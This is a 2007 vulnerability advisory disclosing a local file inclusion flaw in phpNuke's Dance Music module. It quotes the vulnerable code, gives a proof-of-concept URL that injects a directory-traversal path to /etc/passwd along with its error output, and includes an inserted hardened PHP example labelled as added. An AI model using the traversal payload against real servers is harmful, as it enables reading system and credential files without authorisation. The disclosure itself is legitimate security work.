[waraxe-2007-SA#054] - Local File Inclusion in Dance Music module for phpNuke
============================================================================
Author: Janek Vind "waraxe"
Date: 25. September 2007
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-54.html
Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.bestdownload.biz/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=251&title=Dance%20Music%20for%20PHP-Nuke
Dance Music for PHP-Nuke
by MultiMedia http://www.multimedia.com.ro
and Nicolae Sfetcu http://www.sfetcu.com
Vulnerabilities: Local File Inclusion in "index.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Let's take a peek at the source code of "index.php":
------------>[source code]<------------
include("header.php");
...
$ACCEPT_FILE['Acid_house.html'] = 'Acid_house.html';
$ACCEPT_FILE['Alternative_dance.html'] = 'Alternative_dance.html';
$ACCEPT_FILE['Ambient_house.html'] = 'Ambient_house.html';
...
$page = $_GET['page'];
...
$pagename = $ACCEPT_FILE[$page];
if (!isSet($pagename)) $pagename = "index.html";
include("modules/Dance_Music-MM/$pagename");
------------>[/source code]<-----------
As we can see, the "$ACCEPT_FILE" array is never initialized before entries are
added to it, so we can insert arbitrary values into it through
$_GET/$_POST/$_COOKIE parameters if "register_globals" is active.
Proof-of-concept test:
http://victim.com/modules.php?name=Dance_Music-MM&page=1
&ACCEPT_FILE[1]=../../../../../../../../../etc/passwd
Warning: main() [function.main]: open_basedir restriction in effect.
File(./modules/Dance_Music-MM/../../../../../../../../../../../../etc/passwd
) is not within the allowed path(s): (/home/www/web32/)
in /home/www/web32/html/portal/modules/Dance_Music-MM/index.php on line 154
So the local file inclusion exists, but safe mode can make exploitation harder.
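The root cause shown above is that "index.php" adds entries to "$ACCEPT_FILE" without resetting it first. A hardened lookup, as an added example (not code from the module or from this advisory; resolve_page() and MODULE_DIR are hypothetical names, and the requests are constructed), keeps the allow-list in a local variable so request parameters cannot seed it:

```php
<?php
// Added example, not the module's code. resolve_page() and MODULE_DIR are
// hypothetical names; only the three file names come from the advisory.
const MODULE_DIR = __DIR__ . '/modules/Dance_Music-MM';

function resolve_page(array $query): string
{
    // The allow-list is a local variable assigned in a single statement, so a
    // request parameter named ACCEPT_FILE can never pre-populate it, with or
    // without register_globals.
    $acceptFile = [
        'Acid_house.html'        => 'Acid_house.html',
        'Alternative_dance.html' => 'Alternative_dance.html',
        'Ambient_house.html'     => 'Ambient_house.html',
    ];

    $page = $query['page'] ?? '';
    // PHP turns "page[]=x" into an array; accept only a plain string key.
    if (!is_string($page) || !isset($acceptFile[$page])) {
        return 'index.html';
    }

    $name = $acceptFile[$page];
    // Defence in depth: the value must be a bare file name, never a path.
    if ($name !== basename($name) || strpos($name, "\0") !== false) {
        return 'index.html';
    }
    return $name;
}

// Constructed requests, shaped like the parameters discussed in the advisory.
$requests = [
    ['page' => 'Acid_house.html'],                                    // allowed page
    ['page' => '1', 'ACCEPT_FILE' => ['1' => '../../../etc/passwd']], // injected array
    ['page' => ['Acid_house.html']],                                  // non-string key
    [],                                                               // no parameter
];
foreach ($requests as $query) {
    // The module itself would include() this path instead of printing it.
    echo MODULE_DIR . '/' . resolve_page($query), PHP_EOL;
}
```

Only the first request resolves to a named page; the other three fall back to "index.html".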
//-----> See ya soon and have a nice day ;) <-----//
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to ToXiC, LINUX, y3dips, Sm0ke, Heintz, slimjim100, Chb
and anyone else who knows me!
Greetings to Raido Kerna.
Greetings to the people of Torufoorum!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[email protected]
Janek Vind "waraxe"
Homepage: http://www.waraxe.us/
Shameless advertisement:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Free Service manuals - http://service-manuals.waraxe.us/
User Manuals - http://user-manuals.waraxe.us/
---------------------------------- [ EOF ] ----------------------------